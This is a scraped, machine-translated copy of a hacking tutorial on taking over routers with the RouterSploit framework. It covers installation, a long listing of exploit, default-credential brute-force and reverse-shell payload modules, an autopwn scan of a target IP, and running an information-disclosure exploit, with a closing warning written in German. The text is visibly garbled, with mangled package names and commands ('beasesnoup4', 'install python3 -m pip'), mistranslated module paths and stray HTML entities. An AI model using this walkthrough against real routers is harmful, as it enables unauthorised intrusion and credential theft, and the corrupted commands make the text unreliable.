قالب وردپرس درنا توس
Home / Tips and Tricks / How To Take Control Of A Router With RouterSploit «Null Bytes :: WonderHowTo

How To Take Control Of A Router With RouterSploit «Null Bytes :: WonderHowTo



A router is the core of any Internet experience, but most people do not spend a lot of time setting up this critical hardware. Old firmware, standard passwords and other configuration issues are still being followed by many organizations. Using the bad, neglected computer in these routers has become so popular and easy that automated tools have been created to make the process a breeze.

In this hacking tutorial, we learn RouterSploit, a tool for automating the process of router evaluation. But before we go in directly, let's get some background information about the tools available and why router utilization is so great.

The Basics behind Router Usage

Router utilization works by violating a router's Wi-Fi security. Bypass the administrator logon page and access administrative features. An experienced attacker can then target the existing firmware that runs the router into a practice called "rootkitting", where custom firmware is inserted into the router to enable advanced malicious functionality.

This may vary depending on an attacker's objectives and resources. This includes spying on the user and any connected devices that inject malware into the browser to exploit attached devices, allowing for advanced spear-phishing attacks and illegal traffic Routing criminal activities through exploited routers.

Hacking with Cherry Blossom

Government agencies like the NSA and CIA are picking up exploits for routers, and the ShadowBrokers have threatened to release these exploits on the heels of Windows SMB leaks, the WanaCry (or WannaCry) brought forth. If they follow the threats to wipe out router exploits in June, tools like Cherry Blossom might prevail.

These tools from NSA and CIA control entire networks of infected routers and turn them into advanced wireless spy devices on the ground. Why build a fancy espionage device when you can turn a home router into one?

Cherry Blossom is a rootkit master framework in which routers are automatically exploited and turned into "fly traps". A Flytrap is a router that has been compromised and updated with special firmware that prevents the user from updating or modifying the new firmware.

Cherry Blossom can control many "fly traps" providing instant access to advanced spy devices that are in the home or work of a target. Image via Cherry Blossom Quick Start Guide / WikiLeaks / CIA

The flyer trap sets up a "beacon" on a command-and-control server called "Cherryweb" and then receives "missions" from an operator via an encrypted VPN tunnel Advanced modules, such as "Windex", which perform a drive-by-malware injection attack against any connected target, can turn a Flytrap into an advanced remote espionage platform that can be controlled from anywhere.

Cherry Blossom displays mission commands sent to Flytrap devices, including shell code, recon scripts, and exploits. Some poor guy will get his cherry blossom. Image of Cherry Blossom Quick Start Guide / WikiLeaks / CIA

Criminal IoT & Router Hacking

Apart from the spy application that the CIA focuses on, routers and IoT devices are often attacked because of their routing capability. RouterSploit, the tool we work with today, not only compromises routers, it can also go behind webcams and other connected devices.

While the CIA uses VPN connections to hide traffic to and from command-and-control servers cybercriminals will use these devices to detect malicious traffic to avoid discovery. In fact, networks of these infected routers and IoT devices are sold as black market proxies to hide illegal activities such as credit card theft, darknet transactions, and DDoS attacks. If you do not back up your router, you could log in to forward traffic to criminal hackers.

Most people set up routers and forget about setting them to not change, update the firmware, or protect them in any other way. Image by nito500 / 123RF

Beginner router hacking

Simply trying out the default password is the first step towards router usage, but there are also advanced frameworks for beginners. Why would a beginner want to use a router? At the local level, you have complete access to the network if you completely compromise the router. In this way, you can control or forward the destination's Internet experience to any location or anywhere and forward ports for remote access.

You should consider a router as an early and productive target during the stages of engagement. Even if you are a beginner, the autopwn scanner on RouterSploit will automatically test a number of vulnerabilities against a destination IP address, reducing the process of finding a potential exploit to a few seconds.

What is? RouterSploit?

RouterSploit is a handy Python program that automates most tasks related to compromising a router. Modeled after Metasploit its commands are familiar to anyone familiar with the Metasploit framework. It includes scanning and exploit modules and is available for Kali Linux (and Mac OS X or Mac OS X if you want).

Once connected to a destination network, a scan shows if a router can be easily exploited by the framework. Today we'll go through the autopwn feature to quickly identify vulnerabilities on routers and attached devices.

The RouterSploit Exploit Framework landing page with autopwn options. [19659028] Getting It Running – What You Need

RouterSploit is great because it runs on Kali Linux, our Kali Raspberry Pi, macOS or Mac OS X, Windows and even on an uninhabited Android phone. In the beginning we have to deal with some dependencies and make sure that Python is installed. Besides, compromising a router has never been easier from any device you have on hand.

Step 1: Install Python and Dependencies

To continue, we need to make sure that Python is installed needs some of the following packages:

  • Python3 (with pip)
  • requests
  • Paramiko
  • Beautifulsoup4
  • Pysnmp
  • Gnureadline (MacOS / Mac OS X only)

You can install them all with apt-get :

  apt-get install python3-pip requests paramiko beasesnoup4 pysnmp 

Step 2: Installing RouterSploit on Mac, Kali & Others

To install on Kali Linux, open a terminal window and enter the following commands:

  Git Clone https://github.com/ threat9 / routersploit
cd routersploit
install python3 -m pip -r requirements.txt
python3 rsf.py 

For Mac OS or Mac OS X, the method is similar. In a terminal window, type the following:

  git clone https://github.com/threat9/routersploit
cd routersploit
sudo easy_install pip
sudo pip install -r requirements.txt 

Step 3: Run RouterSploit

For the first time, connect your computer to a network with a router that you want to scan. Navigate to the RouterSploit folder and run RouterSploit by entering the following commands.

  cd
cd routersploit
sudo python ./rsf.py

The RouterSploit framework will open, and you'll find that it's remarkably similar to the Metasploit framework, both in interface style and in workflow.

Using a command line interface, you can enter simple commands to scan and misuse routers, and you can enter anything that RouterSploit has to offer: [19659039] show all

As you can see in the following issue, There are many exploits, default credits and scanners! How funny.

  creds / generic / snmp_bruteforce
creds / generic / telnet_default
creds / generic / ssh_default
creds / generic / ftp_bruteforce
creds / generic / http_basic_digest_bruteforce
creds / generic / ftp_default
creds / generic / http_basic_digest_default
creds / generic / ssh_bruteforce
creds / generic / telnet_bruteforce
creds / router / ipfire / ssh_default_creds
creds / router / ipfire / telnet_default_creds
creds / router / ipfire / ftp_default_creds
creds / router / bhu / ssh_default_creds
creds / router / bhu / telnet_default_creds
creds / router / bhu / ftp_default_creds
Credit / Router / Linksys / ssh_default_creds
creds / router / linksys / telnet_default_creds
Credit / Router / Linksys / ftp_default_creds
creds / router / technicolor / ssh_default_creds
creds / router / technicolor / telnet_default_creds
creds / router / technicolor / ftp_default_creds
creds / router / asus / ssh_default_creds
creds / router / asus / telnet_default_creds
creds / router / asus / ftp_default_creds
Credit / Router / Billions / ssh_default_creds
Credit / Router / Billions / telnet_default_creds
creds / router / billion / ftp_default_creds
Credit / Router / zte / ssh_default_creds
creds / router / zte / telnet_default_creds
creds / router / zte / ftp_default_creds
Credit / Router / Ubiquiti / ssh_default_creds
Credit / Router / Ubiquiti / Telnet_default_creds
Credit / Router / Ubiquiti / ftp_default_creds
creds / router / asmax / ssh_default_creds
creds / router / asmax / telnet_default_creds
creds / router / asmax / ftp_default_creds
creds / router / asmax / webinterface_http_auth_default_creds
creds / router / huawei / ssh_default_creds
creds / router / huawei / telnet_default_creds
creds / router / huawei / ftp_default_creds
creds / router / tplink / ssh_default_creds
creds / router / tplink / telnet_default_creds
creds / router / tplink / ftp_default_creds
creds / router / netgear / ssh_default_creds
creds / router / netgear / telnet_default_creds
creds / router / netgear / ftp_default_creds
creds / router / mikrotik / ssh_default_creds
creds / router / mikrotik / telnet_default_creds
creds / router / mikrotik / ftp_default_creds
creds / router / mikrotik / api_ros_default_creds
creds / router / movistar / ssh_default_creds
creds / router / movistar / telnet_default_creds
creds / router / movistar / ftp_default_creds
creds / router / dlink / ssh_default_creds
creds / router / dlink / telnet_default_creds
creds / router / dlink / ftp_default_creds
Credit / Router / Juniper / ssh_default_creds
Credit / Router / Juniper / Telnet_default_creds
Credit / Router / Juniper / ftp_default_creds
creds / router / comtrend / ssh_default_creds
creds / router / comtrend / telnet_default_creds
creds / router / comtrend / ftp_default_creds
creds / router / fortinet / ssh_default_creds
creds / router / fortinet / telnet_default_creds
creds / router / fortinet / ftp_default_creds
creds / router / belkin / ssh_default_creds
creds / router / belkin / telnet_default_creds
creds / router / belkin / ftp_default_creds
creds / router / netsys / ssh_default_creds
creds / router / netzeys / telnet_default_creds
Credit / Router / Networks / ftp_default_creds
creds / router / pfsense / ssh_default_creds
creds / router / pfsense / webinterface_http_form_default_creds
creds / router / zyxel / ssh_default_creds
Credit / Router / Zyxel / Telnet_default_creds
creds / router / zyxel / ftp_default_creds
Credit / Router / Thomson / ssh_default_creds
Credit / Router / Thomson / Telnet_default_creds
Credit / Router / Thomson / ftp_default_creds
creds / router / netcore / ssh_default_creds
creds / router / netcore / telnet_default_creds
creds / router / netcore / ftp_default_creds
creds / router / cisco / ssh_default_creds
creds / router / cisco / telnet_default_creds
creds / router / cisco / ftp_default_creds
creds / cameras / grandstream / ssh_default_creds
creds / cameras / grandstream / telnet_default_creds
creds / cameras / grandstream / ftp_default_creds
creds / cameras / basler / ssh_default_creds
creds / cameras / basler / webinterface_http_form_default_creds
creds / cameras / basler / telnet_default_creds
creds / cameras / basler / ftp_default_creds
creds / cameras / avtech / ssh_default_creds
creds / cameras / avtech / telnet_default_creds
creds / cameras / avtech / ftp_default_creds
creds / cameras / vacron / ssh_default_creds
creds / cameras / vacron / telnet_default_creds
creds / cameras / vacron / ftp_default_creds
creds / cameras / acti / ssh_default_creds
creds / cameras / acti / webinterface_http_form_default_creds
creds / cameras / acti / telnet_default_creds
creds / cameras / acti / ftp_default_creds
creds / cameras / sentry360 / ssh_default_creds
creds / cameras / sentry360 / telnet_default_creds
creds / cameras / sentry360 / ftp_default_creds
creds / cameras / siemens / ssh_default_creds
creds / cameras / siemens / telnet_default_creds
creds / cameras / siemens / ftp_default_creds
creds / cameras / american_dynamics / ssh_default_creds
creds / cameras / american_dynamics / telnet_default_creds
creds / cameras / american_dynamics / ftp_default_creds
creds / cameras / videoiq / ssh_default_creds
creds / cameras / videoiq / telnet_default_creds
creds / cameras / videoiq / ftp_default_creds
Credits / Cameras / jvc / ssh_default_creds
creds / cameras / jvc / telnet_default_creds
creds / cameras / jvc / ftp_default_creds
creds / cameras / speco / ssh_default_creds
creds / cameras / speco / telnet_default_creds
creds / cameras / speco / ftp_default_creds
creds / cameras / iqinvision / ssh_default_creds
creds / cameras / iqinvision / telnet_default_creds
creds / cameras / iqinvision / ftp_default_creds
creds / cameras / avigilon / ssh_default_creds
creds / cameras / avigilon / telnet_default_creds
creds / cameras / avigilon / ftp_default_creds
creds / cameras / canon / ssh_default_creds
creds / cameras / canon / telnet_default_creds
creds / cameras / canon / ftp_default_creds
creds / cameras / canon / webinterface_http_auth_default_creds
creds / cameras / hikvision / ssh_default_creds
creds / cameras / hikvision / telnet_default_creds
creds / cameras / hikvision / ftp_default_creds
creds / cameras / dlink / ssh_default_creds
creds / cameras / dlink / telnet_default_creds
creds / cameras / dlink / ftp_default_creds
creds / cameras / honeywell / ssh_default_creds
creds / cameras / honeywell / telnet_default_creds
creds / cameras / honeywell / ftp_default_creds
Credit / Cameras / Samsung / ssh_default_creds
creds / cameras / samsung / telnet_default_creds
creds / cameras / samsung / ftp_default_creds
creds / cameras / axis / ssh_default_creds
creds / cameras / axis / telnet_default_creds
Creds / Cameras / Axis / ftp_default_creds
Credits / Cameras / Axis / Webinterface_http_auth_default_creds
creds / cameras / arecont / ssh_default_creds
creds / cameras / arecont / telnet_default_creds
creds / cameras / arecont / ftp_default_creds
creds / cameras / brick / ssh_default_creds
creds / cameras / brick / telnet_default_creds
creds / cameras / brickcom / ftp_default_creds
creds / cameras / brickcom / webinterface_http_auth_default_creds
creds / cameras / mobotix / ssh_default_creds
creds / cameras / mobotix / telnet_default_creds
creds / cameras / mobotix / ftp_default_creds
Creds / Cameras / geovision / ssh_default_creds
creds / cameras / geovision / telnet_default_creds
Creds / Cameras / geovision / ftp_default_creds
creds / cameras / stardot / ssh_default_creds
creds / cameras / stardot / telnet_default_creds
creds / cameras / stardot / ftp_default_creds
creds / cameras / cisco / ssh_default_creds
creds / cameras / cisco / telnet_default_creds
creds / cameras / cisco / ftp_default_creds
User data / perl / bind_tcp
Payload / perl / reverse_tcp
Payload / python / bind_tcp
Payload / python / reverse_tcp
User data / python / bind_udp
Payload / python / reverse_udp
Payload / mipsbe / bind_tcp
Payloads / mipsbe / reverse_tcp
Payload / armle / bind_tcp
Payloads / Armle / Reverse_tcp
User data / x86 / bind_tcp
Payload / x86 / reverse_tcp
User data / php / bind_tcp
Payload / php / reverse_tcp
Payload / cmd / php_reverse_tcp
Payload / cmd / python_reverse_tcp
Payload / cmd / python_bind_tcp
Payload / cmd / perl_reverse_tcp
User data / cmd / netcat_reverse_tcp
Payload / cmd / awk_reverse_tcp
User data / cmd / awk_bind_tcp
Payload / cmd / bash_reverse_tcp
User data / cmd / php_bind_tcp
User data / cmd / awk_bind_udp
User data / cmd / netcat_bind_tcp
User data / cmd / perl_bind_tcp
Payload / cmd / python_reverse_udp
Payload / cmd / python_bind_udp
User data / x64 / bind_tcp
User data / x64 / reverse_tcp
Payload / mipsle / bind_tcp
Payloads / Mipsle / Reverse_tcp
Scanner / Autopwn
Scanner / Miscellaneous / Misc_scan
Scanner / router / router_scan
Scanner / Cameras / Camera_scan
Exploits / Generic / Shellshock
exploits / generic / ssh_auth_keys
Exploits / Generic / Heartbleed
Exploits / misc / asus / b1m_projector_rce
Exploits / misc / wepresent / wipg1000_rce
Exploits / misc / miele / pg8528_path_traversal
Exploits / Router / ipfire / ipfire_oinkcode_rce
Exploits / Router / ipfire / ipfire_proxy_rce
Exploits / Router / ipfire / ipfire_shellshock
Exploits / Router / 2wire / gateway_auth_bypass
Exploits / Router / 2wire / 4011g_5012nv_path_traversal
Exploits / Router / bhu / bhu_urouter_rce
Exploits / Routers / Linksys / 1500_2500_rce
Exploits / Routers / Linksys / Smartwifi_password_disclosure
Exploits / Router / Linksys / wrt100_110_rce
Exploits / Routers / Linksys / wap54gv3_rce
Exploits / Router / Technicolor / tg784_authbypass
Exploits / Router / Technicolor / tc7200_password_disclosure_v2
Exploits / Router / Technicolor / dwg855_authbypass
Exploits / Router / Technicolor / tc7200_password_disclosure
Exploits / Router / asus / infosvr_backdoor_rce
Exploits / Router / asus / rt_n16_password_disclosure
Exploits / Routers / Billions / Billion_5200w_rce
Exploits / Routers / Billions / Billions_7700nr4_password_disclosure
Exploits / Router / zte / f460_f660_backdoor
Exploits / Router / zte / zxv10_rce
Exploits / Router / Ubiquiti / Airos_6_x
Exploits / Router / asmax / ar_1004g_password_disclosure
Exploits / Router / asmax / ar_804_gu_rce
Exploits / Router / huawei / hg520_info_dislosure
Exploits / Router / huawei / hg866_password_change
Exploits / Router / huawei / hg530_hg520b_password_disclosure
Exploits / Router / huawei / e5331_mifi_info_disclosure
Exploits / Router / tplink / wdr740nd_wdr740n_backdoor
Exploits / Router / tplink / archer_c2_c20i_rce
Exploits / Router / tplink / wdr740nd_wdr740n_path_traversal
exploits / routers / tplink / wdr842nd_wdr842n_configure_disclosure
Exploits / Router / Netgear / jnr1010_path_traversal
Exploits / Router / Netgear / n300_auth_bypass
Exploits / Router / Netgear / multi_password_disclosure-2017-5521
Exploits / Router / Netgear / dgn2200_dnslookup_cgi_rce
Exploits / Router / Netgear / Prosafe_rce
Exploits / Router / Netgear / r7000_r6400_rce
Exploits / Router / Netgear / Multi_rce
Exploits / Router / Netgear / wnr500_612v3_jnr1010_2010_path_traversal
Exploits / Router / Netgear / dgn2200_ping_cgi_rce
Exploits / routers / mikrotik / routeros_jailbreak
Exploits / Router / movistar / adsl_router_bhs_rta_path_traversal
Exploits / Router / dlink / dsp_w110_rce
Exploits / Router / dlink / dgs_1510_add_user
Exploits / Router / dlink / dir_645_815_rce
Exploits / Router / dlink / dir_815_850l_rce
Exploits / Router / dlink / dir_300_320_615_auth_bypass
Exploits / Router / dlink / dir_645_password_disclosure
Exploits / Router / dlink / dir_850l_creds_disclosure
Exploits / Router / dlink / dvg_n5402sp_path_traversal
Exploits / Router / dlink / dsl_2640b_dns_change
Exploits / Router / dlink / dcs_930l_auth_rce
Exploits / Router / dlink / dir_825_path_traversal
Exploits / Router / dlink / multi_hedwig_cgi_exec
Exploits / Router / dlink / dns_320l_327l_rce
Exploits / Router / dlink / dsl_2730_2750_path_traversal
Exploits / Router / dlink / dsl_2750b_info_disclosure
Exploits / Router / dlink / dir_300_600_rce
Exploits / Router / dlink / dwl_3200ap_password_disclosure
Exploits / Router / dlink / dsl_2740r_dns_change
Exploits / Router / dlink / dir_8xx_password_disclosure
Exploits / Router / dlink / dwr_932b_backdoor
Exploits / Router / dlink / dsl_2730b_2780b_526b_dns_change
Exploits / Router / dlink / dwr_932_info_disclosure
Exploits / Router / dlink / dir_300_320_600_615_info_disclosure
Exploits / Router / dlink / dsl_2750b_rce
Exploits / Router / dlink / multi_hnap_rce
Exploits / Router / dlink / dir_300_645_815_upnp_rce
Exploits / Router / 3com / ap8760_password_disclosure
Exploits / Router / 3com / imc_path_traversal
Exploits / Router / 3com / officeconnect_rce
Exploits / Router / 3com / officeconnect_info_disclosure
Exploits / Router / 3com / imc_info_disclosure
Exploits / Router / comtrend / ct_5361t_password_disclosure
Exploits / Router / Fortinet / Fortigate_os_backdoor
Exploits / router / multi / rom0
Exploits / Router / multi / tcp_32764_rce
Exploits / routers / multi / bad luck cookie
Exploits / Router / multi / tcp_32764_info_disclosure
Exploits / Router / multi / gpon_home_gateway_rce
Exploits / Router / Belkin / g_plus_info_disclosure
Exploits / Router / belkin / play_max_prce
Exploits / Router / belkin / n150_path_traversal
Exploits / Router / belkin / n750_rce
Exploits / Router / belkin / g_n150_password_disclosure
Exploits / Router / Belkin / Auth_Bypass
Exploits / Router / Netzsys / multi_rce
Exploits / Router / Shuttle / 915wm_dns_change
Exploits / Router / Zyxel / d1000_rce
Exploits / Router / zyxel / p660hn_t_v2_rce
Exploits / Router / Zyxel / d1000_wifi_password_disclosure
Exploits / Router / Zyxel / Zywall_usg_extract_hashes
Exploits / Router / zyxel / p660hn_t_v1_rce
Exploits / Router / Thomson / twg850_password_disclosure
Exploits / Router / Thomson / twg849_info_disclosure
Exploits / Router / netcore / udp_53413_rce
Exploits / Router / Cisco / Secure_acs_bypass
Exploits / Routers / Cisco / Catalyst_2960_rocem
Exploits / Router / Cisco / Ucs_Manager_rce
Exploits / Router / Cisco / Unified_Multi_Path_Traversal
Exploits / Router / Cisco / firepower_management60_path_traversal
Exploits / Router / Cisco / Firepower_management60_rce
Exploits / Router / Cisco / Video_surv_path_traversal
Exploits / Router / Cisco / dpc2420_info_disclosure
exploits / routers / cisco / ios_http_authorization_bypass
exploits / router / cisco / ucm_info_disclosure
Exploits / Cameras / Grandstream / gxv3611hd_ip_camera_sqli
Exploits / Cameras / Grandstream / gxv3611hd_ip_camera_backdoor
Exploits / Cameras / mvpower / dvr_jaws_rce
Exploits / Cameras / Siemens / cvms2025_credentials_disclosure
Exploits / Cameras / avigilon / videoiq_camera_path_traversal
Exploits / Cameras / xiongmai / uc_httpd_path_traversal
Exploits / Cameras / dlink / dcs_930l_932l_auth_bypass
Exploits / Cameras / Honeywell / hicc_1100pt_password_disclosure
Exploits / Cameras / brickcom / corp_network_cameras_conf_disclosure
Exploits / Cameras / brick / users_cgi_creds_disclosure
Exploits / Cameras / Multi / P2P_wificam_credential_disclosure
Exploits / Cameras / multi / dvr_creds_disclosure
Exploits / Cameras / multi / jvc_vanderbilt_honeywell_path_traversal
Exploits / Cameras / multi / netwave_ip_camera_information_disclosure
Exploits / Cameras / Multi / P2P_wificam_rce
generic / bluetooth / btle_enumerate
generic / bluetooth / btle_scan
generic / bluetooth / btle_write
generic / upnp / ssdp_msearch
rsf> 

At the beginning we start with a scan against a destination router, which checks whether any vulnerability could work against it. At the end of the scan, it will return a list of every exploit that works against the target – no research required.

Step 4: Scan a Target

We will use the autopwn scanner to find any vulnerabilities to our target. Find the IP address of the router and save it as we will need to enter it soon. Most of the time the router is at 192.168. 0.1, but that can change. You can use Fing or ARP scan to find the IP address if you do not know it.

After starting RouterSploit, enter the autopwn module by entering the following commands.

  Use scanners / autopwn
show options 

This is very similar to Metasploit. Type and then use and then the desired module, options to display the variables of the selected module, set Each of the variables you use in see options and finally to run the module. Quite easy. To close the module and get to the main screen, enter exit

  rsf> scanners / autopwn
RSF (AutoPwn)> Show options

Target options:

Name Current Settings Description
---- ---------------- -----------
Destination Destination IPv4 or IPv6 address

Module options:

Name Current Settings Description
---- ---------------- -----------
http_port 80 destination web interface port
http_ssl false HTTPS enabled: true / false
ftp_port 21 destination FTP port (default: 21)
ftp_ssl false FTPS enabled: true / false
ssh_port 22 destination SSH port (default: 22)
telnet_port 23 destination telnet port (default: 23)
threads 8 

In this case, the destination is set to the IP address of the router. Enter the destination and then the IP address of the router and press Enter. Finally, enter run to begin the scan.

  rsf (AutoPwn)> set target 10.11.0.4
[+] {& # 39; goal & # 39 ;: & # 39; 10 .11.0.4 & # 39;}
rsf (AutoPwn)> run 

Step 5: Select and configure the exploit

After the scan is complete, a list of vulnerabilities found will be displayed. We can choose from this list which exploit is best for our needs. Here we see a router with many vulnerabilities.

  [*] Elapsed time: `` 9.301568031 seconds

[*] Exploitability could not be verified:
- Exploits / Routers / Billions / 5200w_rce
- Exploits / Router / Cisco / Catalyst_2960_rocem
- Exploits / Router / Cisco / Secure_acs_bypass
- Exploits / Router / dlink / dir_815_8501_rce
- Exploits / Router / dlink / dsl_2640b_dns_change
- Exploits / Router / dlink / dsl_2730b_2780b_526_dns_change
- Exploits / Router / dlink / dsl_2740r_dns_change
- Exploits / Router / Netgear / dgn2200_dnslookup_cgi_rce
- Exploits / Router / Shuttle / 915wm_dns_change

[*] Device is vulnerable:
- Exploits / Router / 3com / 3crads172_info_disclosure
- Exploits / Router / 3com / officialconnect_rce
- Exploits / Router / dlink / dcs_9301_auto_rce
- Exploits / Router / dlink / dir_300_600_rce
- Exploits / Router / ipfire / ipfire_proxy_rce
- Exploits / Routers / Linksys / 1500_2500_rce
- Exploits / Router / Netgear / Prosafe_rce
- Exploits / Router / Zyxel / Zywall_usg_extract_hashes
- Exploits / Router / dlink / dcs_9301_9321_authbypass

rsf (AutoPwn)> 

Let's start with a simple exploit on one of these vulnerable routers, with some disclosing information. To use this exploit, we'll issue the following commands:

  Use exploits / routers / 3com / 3cradsl72_info_disclosure
show options 

A list of variables is displayed, and you can set your destination by typing:

  set target 
check 

This will set the target and confirm that it is vulnerable.

  rsf (AutoPwn)> use Exploits / Router / 3com / 3cradsl72_info_disclosure
Show options
rsf (3Com 3CRADSL72 Info Disclosure)> Show options

Target options:

Name Current Settings Description
---- ---------------- -----------
Destination Destination IPv4 or IPv6 address

rsf (3Com 3CRADSL72 Info Disclosure)> set the target 10.11.0.4
[+] {& # 39; goal & # 39 ;: & # 39; 10 .11.0.4 & # 39;}
rsf (3Com 3CRADSL72 Info Disclosure)> check
/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7.site-package ... reRequestWarning: An unverified HTTPS request is made. Add the certificate https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings InsecureRequestWarning)
[+] The target is vulnerable
rsf (3Com 3CRADSL72 Info Disclosure)> 

Step 6: Run the Exploit

The target looks good and vulnerable. To fire the payload, tap run .

  rsf (3Com 3CRADSL72 Info Disclosure)> run
[*] Current module ...
[*] Send inquiry to download confidential information
/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7.site-package ... reRequestWarning: An unverified HTTPS request is made. Add the certificate https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings InsecureRequestWarning)
[+] Use success
[*] The file /app_sta.stm is read




 

 

If the exploit is successful, you should be greeted with internal configuration settings that may compromise user login and password, device default and serial number, and access to the router, among other things. Other modules let you remotely feed code or pass the router's password directly. What you can do depends on what the destination router is prone to.

Warnungen

Dieses Intro sollte Sie mit RouterSploit vertraut machen, um einen Router zu kompromittieren, jetzt können Sie andere Module verwenden und mit verschiedenen Arten von Exploits experimentieren. Obwohl Autopwn eine praktische Funktion ist, versucht es viele verschiedene Exploits und ist daher im Netzwerk sehr laut. Die bevorzugte Option besteht darin, Ihr Ziel zu scannen, einige Rekonfigurationen durchzuführen und nur die relevanten Module für den Hersteller des Ziel-Routers auszuführen. Während die Nutzung von Routern im Trend liegen kann, sollten Sie daran denken, dass der Router von jemand anderem ohne Erlaubnis ein Verbrechen darstellt. Es sei denn du bist der CIA.

Nicht verpassen: Wie man Router auf einem unbewohnten Android Phone ausnutzt

Sie können mir hier Fragen stellen oder @ sadmin2001 auf Twitter oder Instagram.

Titelbild und Screenshots von SADMIN / Null Byte




Source link